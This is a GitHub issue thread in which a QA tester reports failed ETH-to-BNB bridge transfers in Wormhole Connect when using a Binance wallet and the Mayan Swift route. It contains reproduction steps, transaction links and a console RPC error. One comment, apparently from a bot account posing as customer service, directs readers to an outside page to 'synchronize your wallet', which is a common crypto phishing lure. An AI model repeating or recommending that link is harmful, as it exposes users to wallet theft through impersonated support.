### ISSUE TITLE
[QA] Transaction fails when sending ETH with Binance wallet using Mayan Swift route

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#3039]
## Describe the current behavior in detail
Reproducible on https://wormhole-connect-mainnet.netlify.app/. 

Steps:
1. Select Ethereum network and ETH token in "From" section (Binance wallet is auto connected)
2. Select BSC network and BNB token in "To" section (Binance wallet is auto-connected)
3. Enter min required amount, in my case 0.012 ETH
4. Click on "Review transaction" button
5. Click on "Confirm transaction" button

Actual result: Transaction is in pending status for more than 2 hours. 
Expected result: Transaction completes in ~12 seconds. 

## Notes/ Attachments

Send from tx: https://etherscan.io/tx/0x8c5b516052f389997df49bfbb8a6db5ef8ff69f802f67b61c319e5e2e828ef1f 

https://github.com/user-attachments/assets/d7ca916b-9ad0-4764-a1e7-86309cf1972c

![image](https://github.com/user-attachments/assets/060b5e61-87b6-4f24-9354-e3c158a7c2bc)

![image](https://github.com/user-attachments/assets/1ebe281c-8134-4d9e-9eff-c8c37ff8e6c9)

**Comment by tsadovska** [comment]
Transaction mentioned in the ticket failed, please see details on [Etherscan](https://etherscan.io/tx/0x8c5b516052f389997df49bfbb8a6db5ef8ff69f802f67b61c319e5e2e828ef1f).


Today I launched the same scenario on [Netlify build](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGB2CmAuDuB7ATgawFxgOQFsCGAlpDLFgDThgCuBmwEAzgBaLwCSkACsogObLQGDAOoEAJrziZYyKtDABfChB5VYgzAG1KEAHT6AIgFEAYgEEAqgBkAKgH0ASgHkLNowGVlEMAFk8ATzxIB0Q1aDJfAKCQsJ8AYRtOCL9A4ND1d2E2ExsvPX1IWFgY9QYAClBvb1hEVGhIBjodKrBzADkbJx87C3cDOK1mlrBK4ZaAYyZCSEwsI1gmaAEqHHIhsfxIPElkWYAGAA9oACExOOgATjwLgEYAZjELgBY9vaMjAHYAVmgAMzubucABwAIzEdyeTwAbAAmAx7G54G7jG5rMYtGp1GbYQ5mPYgoFQi63cawm6gu5QlFiG4XAxPPAwy5GEF7cZGSl7KEnJ5AtHo6rIIIMcbQAgANyWgwFLVGMqqeDEYgEQn2By%2BX1%2BHyBML2dy%2BH3MNw%2BZhuRjiIN5RguXzpXyMULuHxBJhMNqhYihJn58uq%2FgADtBZkhkDgWAAbaA%2B%2BVKdbDAC6eTGsZlcoFk2msxMQRqqyT6M22ylOIOUKBYmOMN%2Bey%2BZkZYg%2BH2MvwuQJuvzEMJB0DuMKhUPuL3GFxho5Mx2j6Mx9TVMJMHzudz2NuOQL2eKeILuoL2BhubLiQKBTy%2BMIZD2XBMpeEnYxkwtFEuL2l9EDTvsVysEjRLoKeH2rJkPmgXVjSecYPihPAW33RVxj2RUgTwTc9SeKtwNvGVYADINsBDMNEEjTDk3zMZEzjbwUzI0iICscREDseAGFgIwbAACWlAV3zGDMiFmeZFmWPMKKqQsdjVEFniQi5txhD5PSQnUTChL57jMGltQuKEngMZCgQAkDjgMC5iKqadsSwQ4ALuC44i%2BNsTFtL5ji%2BO5xi%2BcYQVpEF4S3X5yzMKkZPtGE4jwPZTMFB8xUlXYwBfV9uJlT8VR%2FSyDlNMw4jiG5oG5MQ8ErBzoDBW4OVUr5lzuEwbmMByYQ8iKaIFbDA2DFACKI5rhiomVyJlXqxiSiYpj47BjhFSKIDE4t0qJByvjJIlAWOX4OQMMQDFPJ4xE%2BfdIJBD4LhMdc9jkvluuqWoZxLPt3OgBFts7B0YTXMxeRMGF3L2X5lIMaBgNPa0B0BKawHvBpH1izjfWG9EUu%2FCSe3nB6yw%2BGEjD2MRlLiAxDRMfVjg%2BPBkOOLzIShfpiUJMGzJw9rQwjKNLqqQb0X6gU2e8DnhmEGGhpE7xeIs9xCKCG8WbAGa4qwDpYDrRADAAKSYOo2OgPAADULDYyB%2FCYeAQU4NozDaKFhF4Y5%2FTY1A2OOGxSQbcUrAAaTB8zZiBL5NeOEwAEUAC04guGwA9QX48H9WBjmEAArcULHgD4AE0QQD2P%2FFPQKcFj2BOAAcVj5i%2FbMHA%2FfdoVIZi59BaqOGxgR1VsDlhXldV6B1a1nW9YNo2TbNi2rZtu2HY9D5nbdyW6bavCOqZ2nFElnmBQARyoRB1BltoV89AANFezCBKwQQYOIqHzoEfCsYRhCoThCS%2BNpNahWOHBuHwQV36AXYOek2Nd5WkUuZ11rmAYW%2FEFhLGgCsMG0s1TwXRscG4ZgjD%2FEpNADa0BbQbi0sSVBTxoBAmzHaZ470LqgI9iWY4P1sxrleEebkBoTCEiVKebSkl7JdhhOpfSIIuy3ArtFJ8cUEqw1AQqJUqU1QGBBBqJ4I4Gy0l3DcEEeAjBAiyiCTGNkbiAieByT4aE0ZsgXhAVquEsD4XnlPReoDl49UuvXCA4DsBmGQCCAgMgYGSzgSWVyi4xDrnGIFBkJ51xKi9NAeclNKb3G%2BPOPscRji8ieO7a6FlDjUN%2BngOhewGFYMNCwsQbDNw2h1Hwnhzp%2BGoklhDEU1cRHiJGE0iAjc0qHD3DkswxwiQPTOv2QhRNbhImcnEf8qkng3FcmYSqJ48BQlMeDems9GaEWZk04BLR7EtE2W%2BUBLisBOCjgQHABAGDCV9L49KiIng1TwEdH6MJqq%2FEko2GEWkqQ9IJh6OInp7J6juNAe4aSsRqiybQ14eTCQFOYR6YpfZSmcIqWIXh1TBFV2EfzVMLSwBtLVBcHyoJnSng%2BHEd6eUFxAnGEZQq2NVJxFHNCKE3woR7AXGIRZ5iGadXWa%2BWxvptms0cfs0aFljh4AYLy%2BUVzDj%2BIvGYYJ2lkKVXUp6EwUTIIGFiU6L4CSoRJJSSCm66VwU5MhfkphRSSkcPKdwlFVTJI1IoZXepmL4pNKcS0PFJZOkaJ6RcPpfZuRAiGYiKZxwxnfBuJM6ZsyvjzM5csyxc81kL12dzS6mztmDQUAASi8BzKgkqHDQDEIIAgvBsRePCJQcyp9ECQF%2BBWpoVQmIsXYifcYLaWh1H8MGZirE2KdtvAwfwOAQSEX7e2tit4tiwCfHEUVswJrjFvOZNgYhu3DAOSu4i3r0p3R%2BI9M8z1YRvQ%2Bl9Sqv1KYAywRjLSui4i3i5gQcYDbZhMCKP6RoAB6H9ErJWwAYLoN9RBJDjFQIgEDiAcA%2FtAw0H9JyiwMB%2FeSIEEIf3MSCAVZAYgf1tsHbof0kBeC3ng%2FnaAEHEAbuDEKf0gYxAAFpmJwCYGRwiKBZgAGI7hmDMNVb0pEy3jCQ%2BGH85IkyDWEAwMWWwt3eF7bMaTsmJbrFHeOyd2BhCzrwPOyUi7MzYFFuGcWa70k0eaeiA5xnTPNX3V7H2%2Fsg4hzDhHKOMd46JxTmnDOWcoQ5zzoXYupdy6kRfW%2Biyn7YDfvQH%2BgDcBgPwfA5B6DsH4MoaQ5IFD%2Bo8kfEw7AbDeBcP4Zg8gJmdhwx8AYr8Kg4Zwx2DfZV5AdhkC8BBHYXUrx%2FQHDsOjejBA7AvMglBcYXs8BEZIwAfmNHkssQIbSpNIuRyjkGLPJtWV1dYwnRM%2FihJJpMwhWNQJWPJiAimtNHaEiOsdE7wxKZ03p6ABmxpzEgVd0i67N2WZ4ku7AAljsXIbpIxGVCaFmvodCy1cLrVlK4ZUvhjrn2kVfe%2B7AUWYtxaEAl6DYGVtQbfWlxARAMv4Cyz%2BnL%2Bl8uFeK0gHAZW1kVaq4N2r9XGsoBa21jrkLuu9ZhP1wbh1%2Bx4FG%2FGibvBpsfFm0eBb7GiAUao2tqxqahOUZ25gCTzQpNFY8V4nAp2wDnawMIbXnjZCA6qOp2793SJzoXb9rAbiddm7M1iCzw0DmO9N94ii%2B7Mlg9yRawp0OEU2rh%2FahHAiwvI4ix%2Br9v7%2F1Y6AzjkjePUtwaJwhzLghyeVUp1hyAOG8O0%2Fp5GRnvBqss4axx5rrX2udb2Dzvr%2FoBtDaFyL8bxHxczcJNLr4i31jLYV199bPLbzbfwGJ9XQJ9vNGEIgY5pzzn68N3PhfZzzfeEt5po3D27eGcOWv85Lv6hu4ogco587F8b4kV%2BJuJr%2Ffmsh0H1hIfYfItRYjqP6wUeRbj7FhPgGiWGeyW%2BOMG6exOiGpO2eFOeW%2BeheJWdO5WlW5ezOdWVeTWHOde3OPWTeLeguI2Y2YuEuUu82fesukA8uq2w%2BSum2ww4%2BeAk%2BYAGuQqs%2Bqikqy%2B0AfaWmbBUqFuN22%2B2mNuume%2BL24qkqx%2BkAp%2BVm9uYhvBXqwOd%2Bfu2SAeT%2BsKL%2B7Cb%2BdqH%2Bke6w4WqOWA6O8e8WSeSWqeBO4BmeUB2WuesBBWBeRWRepWSBTONWaBbONenO9ejefOzeAuw2wuhBnexBPepB%2Fe26GelB1G1BKatBLQ9BjBzBlEXgsYCgAA3CAEAA%3D%3D) and it also failed on Etherscan ([transaction details](https://etherscan.io/tx/0x4c7a948dd7e248f86dce988af0745ef7e9fee3299d745406777d7e7780b43640)). I tried to bridge 0.02 ETH to BNB from Ethereum (Binance wallet) to BSC (Binance wallet) with **Mayan Swift route.**  

![image](https://github.com/user-attachments/assets/86ecdb99-307e-45a6-bf50-70ca55c0127a)

Transaction launched with **Mayan route** completed successfully on [Netlify build](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGB2CmAuDuB7ATgawFxgOQFsCGAlpDLFgDThgCuBmwYAzgBaLwASeOARlcgObRkAWWiQqmAGZ4ANg2hlGLeAElIABWSI%2ByaAwYB1AgBMBsTLGRVoYAL4UImqrF2YA2pQgA6bwBEAogBiAIIAqgAyACoA%2BgBKAPIhEX4AyvYQYEJ4AJ54kDGITvIeYN6ekLCw%2BYUMABSg6emwiKiiDHTFDcEAchFxQlEhyT4Awm4dDWD1E9MAxkyEkJhYfrBMgtBUOOTj0%2FiQeALISwAMAB7QAEJGw9AAnHi3AIwAzEa3ACzHx35%2BAOwArNAJM9HjcABxcIzPd7vABsACYfMdHnhHjNHttptMmi1FtgzkFjlwwbDbk8ZgjHhDnrD0UZHrcfO88PC7n4uMcZn4acdYZd3mDMViGhZcgwZtACAA3QRjYXTKbyiZ4IxGHR6E6nf7%2FCS%2FMHw47Pf6%2FYKPX5BR5%2BYZcAV%2BW7%2FRn%2FPyw56%2FLgBAL22FGWEBIVKkVZAAO0CWSGQOBY0mg%2FoDdh2EwAumlhfGlYr5XMFksArkmlsU%2FK9gdZfjTrCwUYLvCJMd%2FkEWUZfr9%2FBJbmDHhIjPCuNBnvDYbCXp8Zrd4eOAhdY8KcaJNfCAr9ns9jvaLmDjoT3lxnhDjj5HpzhmCwe9%2FvDma9V8SaXhp1jRZBxZKZUcwO4A%2BkM5%2BVWrdG0ywhd5flrVlfmgA0zXeGZflhPA20PFUZmOFUwTwbdDXeGtoPvJVYGDUNsHDSNEGjXCsTTANkwTCBKOmajhTCYxECieAGFgPwIjYOV5W%2FLEsyIJYVjWHRNnIhpi0OTUuA%2BNDbl3eFfh9ND9QCWF%2FheIJ6T1W5YXeHx0LBECIIuHxbnExpmjnMsQOeW5hn%2BDsAgdf4Ln%2BZ4Zn%2BGYuAZLgkR3CRKyCWl5KdeFhjwY4LIgR9n2lUsP0%2FSYaKxX91QArACUeIJhmGR5oD5Iw8GrJzoEhJ5uQ0%2F5V2eAJHn8Jz4S8qLC0%2FfCQzDFASLI1r5To%2BUGL63qGj42Z5kE7ALnFaKwEk0tMvLdtHmcylSVBC4JG5HwjB8c93iMP5D1grhfluAJN2ORTBWGiZZzxBaB086BkT27tnXhDcggFAJ4U844JDUnxoHA887SHUEZtiiV4rfRLP1G%2BU0v%2FaS%2B0XZ6K1%2BeE%2FGOIw1OGHwTQCI0Ll%2BPB0IuHyYVhEYyRJGbAw6oiuqjGMbumfrhUG1Mbq5iZ9B44UEYaAT7uSUjcjvNn0jmt8sB6WAG0QHwACkmBaNhoDwAA1EI2EgLImHgLg1C6IIulhfQ%2BAuIM2FQNgLgiCkmylMIAGlIas%2B6wX%2BLWLgCABFAAtYZbgiQPUCkINYAufQACspRCeBfgATS4QPY6yc9gpwWPYDUABxWP2P9oIcH9yHkDFaHXwFgMhdS1V0qWeXFZVtXoA17Xdf1w3jdN83Let237cd71fhd92pexAjOojFn6dsKewF54UAEcqEQZxZa6VefQADVXoIwTCLgGGGKh87BIQwn0fQqDUEl%2Fi6LXYVjmJHiELg9%2BgV3TiZNg3YqwshzCY9cIAiyEqsdYYkl4y01MhTGFxsp%2BGBDSaA21oAOi3LpMkKD3jQDBLmR0HwvrXRSjFT2moLj%2FVzBuL4J4%2BTGgCCSVU549IyUcj2eEWkjJcB7E8CuVcXwJXIV%2BURDQkYajLD4Lg2p3hjibAyfcjwuB4D8GCHKXBsZ2UeKCd43I%2FhYQxpyBeMUZ5MznqRVm4jF6iJXhMEBI1REQOwEEZAXACAWBgaIuBZZ3LLiMJuGYwVmRnk3KqX00BFzU2pi8AEi4BzDAuAKd4HtcRUJoXgOhxwGGYJNCwowbDtz2n1Hwnhbp%2BEYiXlDYRsMbFgOVI3ZG0iUQaIuKSZ6l1BwEJJk8VErlhjAQ0u8R47kgjVTPHgWEpiwDtUIlgYi88l60SXvYhojixGfhcVgOIUcCA4AIAwAsPiJZSTLCid4dU8CnX%2BvCWqEgZLNnhLpWk7SibemGD6RyhpnjQBeGk6yC1qEAyyV8HJJI8nMO9IUgcxTOFlKMLwypginzVxEUlZKGKICSIymcW4fkIRunPL8YYX0CpLjBDMUyxVcYaWGOOOEsIASwmOEuIwMy5mz26tYjFGyGhrPSHyzFAZtkXDwHIGaviFr%2BKvEEYJel0LVS0j6AIUTYI%2BFia6f4CTYRJJSQC%2B6ZxgW0LBbkphBSikcNKdwxFFSZJVNETUmGtd0w2OxU0qRC0DxZKCO024nSBx8jBL0lEoyLiDIBI8EZYyJn%2FCmRy8xCzmZWIXkKiAAqVkJnsf1GwABKNI1FKBUDkDEaARhdAED4HiLxRRKB3TPogSAEhK3tAaGxDiXFT4zFbRMFoWQwzsU4mwLt94GBZG4KRAdHa2D3n2LAeKwxxr3SmjMe8d1lBGB7WNbMk1po3RxfOWkgIXoXjegiT631frVQBtTYGmCsa6V0cMe8ICCAzEbUsJgFQgxtAAPS%2FvFXIWADBPDvqIAIGYqBECgcQDgX9YGny%2Fv2SWBgv6qRgmhL%2B9iuQirICML%2B9tQ7PBBkgHwe8CH87QEg4gDdYZK5BhDEYAAtOxOATByOkRQEsAAxM8IIQRap%2Bl6uWmYyHZCYCpIWfq%2BgGDi32Fu9Ifalgybk5LcYY6J3SGU7OvA86ZSLp3VgMW0gJZrs9rR4V26JpGdU%2BRA92Bva%2BwDsHUO4dI7RzjgnJOqd06Z24bCHOedC7F1LuXXqr7333S%2FbAH96B%2F2AbgCBhDEGoMwbgwh1DyGBCoaNDk34WHYA4bwHhgjsHkAsyiNILQLEJBUGkNIKI76qvICiPwLgUQDRfCDKcKImMGMECiA82CcEZjezwMR0jAB%2BM0OSKxgntKk3qFGqNQYs0myxPVxgibEwBWEUnCz6DY9AnACmIBKewIdqBoljnTA01wSdF2dN6egAZ6zwljtmdxBZhG2z3vXbsx63FpxjWgvoRC810LLUlK4eUvh9qX29TfR%2B7A0XYvxb0IlmD4GVvQffelxARBMv4Gy7%2B3LRkCtFZK0gHA5WrGVeq4NurDWmsoFa3wdrnXjjdd6%2FCfrg2TqDjwKNuNE2%2BDTd%2BLNk8C2ONEEo9RtbiyU3CaoztiTYJ9vFH0MVjxXiTuWcU9AftF3teeMsDdiYd2HtYH0E9hdS6lhuJ12bz7ohvsJm2Y7033jhT2aBZk7JZr8mQ9hVamHtq4cCPC4jyLn7v1%2FoAxj4DWPSM47S%2FBgniGsu6FJ9Vcn2HIC4fw9T2n0Z6d8Bq0zxrnGWttY62C7nfWgwDaG4L4X42SNi5mySKX%2FxFvjGW%2FLzdFjuX3m2%2FgcTYBJPFGk4gPZByjmnbAOd63s%2F53z%2FNw0S3WnHu9TnXbwzuy1%2BHI35ZL7Q%2Bfv2%2BwIf%2FZx%2BAd%2Fk9Ua%2F3prwdB9YSH6HCKkXw6j%2BMJHUW49xYJ5AZJYZ4pa46wbp6E5IbE7Z5k75b56F6lY04VZVbl6M71ZV7NZs4c7149aN7N4C4jZjai7i6S7za94y6QBy6rZD7rYj7K6ibj4ART7rIHaqJyCL7L76DsE8oW7jr3bb7W6276aX5YBioSq9Trrn7u6iHiG8HTC%2B6P4goB4v5Qpv7sIf42pf6R7jARbI5YCo7x4JZJ7Jap546QGZ4wE5a57wGFYF7FZF5lYoEM61YYEs417s515dZ4G85N787DZC7EEd6kHd7kF96zAZ7UE0a0GK6bbTBj4yDMHq7T5pDxg2AADcIAQAA%3D%3D), details on [Mayan Explorer](https://explorer.mayan.finance/swap/0x366ee296e52de70a49fd609baee3374fc78df26cd9bec788ac29685abfdc604b).I bridged 0.011 ETH to BNB from Ethereum (Binance wallet) to BSC (Binance wallet).

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/

**Comment by tsadovska** [comment]
Rechecked the issue on https://portalbridge.com/ and Netlify with following [config](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGB2CmAuDuB7ATgawFxgOQFsCGAlpDLFgDThgCuBmwEAzgBaLwCSkACsogObLQGDAOoEAJrziZYyKtDABfChB5VYgzAG1KEAHT6AIgFEAYgEEAqgBkAKgH0ASgHkLNowGVlEMAFk8ATzxIB0Q1aDJfAKCQsJ8AYRtOCL9A4ND1d2E2ExsInTB9XUhYWBj1BgAKUG9vWERUaEgGOnya8wA5GycfOwt3AzitVpqwapHxgGMmQkhMLCNYJmgBKhxyYfH8SDxJZDmABgAPaAAhMTjoAE48S4BGAGYxS4AWff2jIwB2AFZoADN7rcLgAOABGYnuz2eADYAEwGfa3PC3Ca3dbjcZ1BqzbBHMz7UHA6GXO4TOG3MH3aGosS3S4GZ54WFXIyg%2FYTIxU%2FbQ07PYHojE1GRBBgTaAEABuyyGgvGY1lIzwYjEAiEB0O32%2Bf0%2BwNh%2B3u30%2B5lunzMtyMcVBfKMl2%2B9O%2BRmh90%2BoJMJlt0LE0JMAoVQv8AAdoHMkMgcCwADbQX1%2BpQbEYAXS8grjCvlsqmMzmJiCdTWydlWx20txh2hwLEJ1hf323zMTLEn0%2Bxj%2Bl2Btz%2BYlhoOg91h0OhD1eE0usLHJhOMcFWMa6thJk%2B93u%2B1tJ2B%2B3xz1B9zB%2BwMt3ZcWBwOe31hjMeK8JVLwU4xwqaYslJe0fu86bfSpVgmapbBz0%2BGtmU%2BaA9RNZ4Jk%2BaE8FbA8lQmfYlWBPAt31Z5qwgu8FVgQNg2wUNw0QKMsIxVM%2FSTeMIDI8YKMFKxxEQOx4AYWAjBsAAJGVZQ%2FDFMyIOYFiWFZ80o7wi12dVQReZDLh3WFPi9ZDdRMaFvgeMxaR1S5oWeAwUOBQDQJOAxLhIoV6lnUtAPuS44m%2BdsTDtb4Tm%2Be4Jm%2BCZQTpUEEW3P4KzMalZIdWE4jwfYzNqZARSfKU9jAV831GUTxi%2FVVfywPFbjMOI4luaAeTEPAqwc6BwTuTk1O%2BFd7hMW5jAc2EPIigs3xwoMQxQQjiNa2VqNlWi%2Bt6moeMmaZ%2BOwE5RUiiBxJLTKyzbW5HPJYkgROP5OQMMQDDPZ4xC%2BA8oNBT5LhMDd9nk%2FlhpGGccQW%2Ft3OgRE9q7R1YXXMw%2BRMWF3P2P4VIMaAQLPG1ByBGawAfUVxTiri31G2U0p%2FSTewXZ7y0%2BWEjH2MQVLiAwjRMA0Tk%2BPAUJOLyoWhAYSSJSH%2FQ6%2FCusjaMbvGfrBUGlMbu5kZhHhjFEZqPj7vcIiglvdmxMliTsE6WB60QAwACkmAadjoDwAA1Cx2MgfwmHgUFOHaMx2mhYReBOAN2NQdiThsMlGwlKwAGlIbuuZgW%2BbWThMABFAAtOJLhsIPUD%2BPAA1gE5hAAKwlCx4E%2BABNUEg%2Fj%2Fwz0CnB49gTgAHF45YgOzBwAPPeix9YZfFL33rmpkbVeWbEVvBlbVjWtd1%2FXDeN03zct63bftx3nc%2BV2PelzFcM6sNWYZxQZ7APnBQARyoRB1HirB2nXr0AA117MYErFBBg4ioQvgR8KxhGEKhOCJb52m16F44cW4fFBQ%2FoDdw4DJ2Lu1VpFTmIxhbeFFgJRYyxoCrEhnNXeRwEJYxONlIwAIqTQG2tAO0m5tIkkwc8aAwIcz2heF9a69cvalhOP9HM643jHh5IaEwRJlRnh0lJey3ZYQaQMqCbsdwq4xVrvFRKCNG7eGbhlI4BhQSameKORsdI9y3FBHgIwwIcqghxjZW4QJnici%2BOhTG7Il4QHanhLABFF4ryoivNeIxwEjXrtA7AZhkCggIDIBBK8kHqlckuMQG4JiBUZKeDcypvTQAXDTGmDwfgLn7HEE4fJniewsvdI49CAZ4CYfsFheCjQcLEFwrctpdRCIES6YRaIV7Q1inXJKyVWkQFkeqfcBSzAnGJM9S6A5SGkzuMiZycQAJqWeLcVyZhqqnjwNCSxUM57MwXkRNm0jXGJmltsiAkCIAeKwE4GOBAcAEAYCJN8gTSxImeHVPAp1%2Fqwlqn8KSTZYTaWpH04mno4hensvqe40AHhZOxOqPJjC3hFKJCU9hnpyn9kqbwmpYhBH1NETXZ8EjpEHMVMqdK6pLg%2BTBC6M8nw4hfQKouYEExjLFTxmpOIY4YTQh%2BNCfYi4xDLOsfPbqmzWl7O8M4moQq8VHJOHgBgAq%2FQ3IWsEy8Zhwk6RQtVDSXoTBxKggYRJzpvgpOhGkjJYLLILUhQU6FxS2FlIqTw6p%2FC0V1Kkg0mh1cYbYsFmmaRHSCUo1LN0nRfTLgDP7DyYEIykQzJOBMn4txpmzPmd8RZPLVm2JZhspeQqIAiu8Ns5x%2FUFAAEovAUUoFQaVDhoBiEEAQXgOI%2FHhBAJQO6l9ECQD%2BLWloNRmKsQ4hfCYXaRgNH8CGFibF2L9rvAwfwOBQREVHb29id5tiwGfHEca90poTDvHdNgYhB1jSzJNaaN1Omlker8F6543pwk%2Bt9X61UAY02Bng7G2lDFxDvOAggEw21zCYCUAMzQAD0wGpXStgAwXQv6iCSAmKgRA0HEA4GAzBpowGznFgYMBikwJITAZYkEIqyAxDAZ7eO3QAZIC8DvGhwu0B4OID3SGaKAYgxiAALQsTgEwWjREUBzAAMT3DMGYWqPperVomJhiMv4KQFn6sIBgEttgHu8MOuYSmVNS2GNO2d87sDCGXXgVdUp11HqwOLCMksd3ZOY203iG65hWZs6e31LcsA%2Bz9oHEOYcI5RxjnHROyc04ZyzjnaEecC7F1LuXSuvVv2%2FvugB2AQH0CgfA3AKDaG4MIaQyhtD2HMOSGwwaIpnwCOwCI3gEjZHkPIFZnYCMfBGJ%2FCoBGCMdhf3NeQHYZAvBQR2D1G8AMhw7BYzYwQOwbyoLQQmD7PAlHqMAH4TRFPLMCW0mTep0YYwh%2Bzab1k9WGFJmTv5oQKYLMIHjcDVhqYgBpwzN3hJTpnXOiMmnjOmegOZia8xYEvd6ru%2FdDnD1%2FcErdq5GIz1moYRa5hsLrUIttVUvhtShHOq%2Fb1H9f7sApbSxloQWWkOwb24h39BXEBECK%2FgErwGysGUq9V2rSAcANY2U1lr032ude6ygPrA2hvQtG%2BN2Ek3psnQHHgebSalu8FW58dbx4tt8aIPRxjB27EZskwxs7mB5P5EUzVnxficD3bAI9rAwhje%2BNkFDmoen3ufd6iutdTnPHeNt%2F44YwPzeHPd1gLxJu7ckRh7kuHhSrWlOR0iu1aPHUY5EQl7HSX%2F2AZA2BonkGSfUbJ%2Fl1DVP0PFcEPT6qjPCOQGI6R1n7Ooyc94K1nnXX%2BO9f64N4b%2BwRcTYDFNmbUuZeLao%2FLtbRJlffG28MXbGuQeHf5XeU7%2BBZP6%2BBJd%2FIwhECnPOZc83lv1%2Bb4ufb7wjuDNW6%2B27izJzV1b8P1YuzIPEZHMv2cg%2Fof3NyMOOayPiPo%2BcNj6j1F6KmOyewwOOyW6e6WmeEG2WheuW5OyGBe1OGGtOJeDOFWFeVedWbOjWzWDe3OHWzePWAu7ewuY23evekuc2C2cuCuSum24%2BqukA6u%2B2M%2BWux24wC%2BeAS%2BYABuoqV2mi0qO%2B0AI6hm%2FBMqDub2J%2BRmLuJm5%2Bf2kq0qtm2I9mD%2BAe8hYh%2BK34Hm4e%2BSX%2BrCP%2BiK3C%2F%2BDqgBSewwiWuOWA%2BOGemW2eOWeeFOCBReyBpWZeaBVWleNW1e9W2BXObW%2BBfOreguHeXeYuPeEus20uVBQ%2BNBo%2BdBE%2BkwheTBTGLB6abBIwHBXBPBuaXgcYCgAA3CAEAA).
Scenario checked: 0.001 ETH swap to BNB from Ethereum (Binance wallet) to BSC (Binance wallet). 

Issue is still reproducible. 
Error in Console:
```
Wormhole Connect: error completing transfer Error: could not coalesce error (error={ "message": "Cannot fulfill request" }, payload={ "id": 11, "jsonrpc": "2.0", "method": "eth_blockNumber", "params": [  ] }, code=UNKNOWN_ERROR, version=6.13.5)
    at makeError (pb-index-DfGU0Kno.js:311:17940)
    at Zo.getRpcError (pb-index-DfGU0Kno.js:312:216186)
    at Zo.getRpcError (evm-Cyvodxhp-a_aSvkpj.js:7:1677)
    at pb-index-DfGU0Kno.js:312:218502
```

https://github.com/user-attachments/assets/799b347f-0a88-41ff-b19a-5e6c86e11a13

![Image](https://github.com/user-attachments/assets/0c6943fb-76fe-4071-aafd-de65cd45dd6f)

**Comment by tsadovska** [comment]
Transaction completes without errors on https://portalbridge.com/ when swapping ETH to BNB from Ethereum (MetaMask) to BSC (MetaMask). [Link](https://explorer.mayan.finance/tx/0x7e8627aedadc6a1f8e8ac07676c4005b9ec7e6c4125d5540fcc702662c4ee791) to view transaction details on Mayan Explorer.

https://github.com/user-attachments/assets/6a4bee33-ccd0-4b0d-b21b-c6341d18302d

Currently there is the issue with connecting Binance wallet. It is reported in Portal Bridge repository.
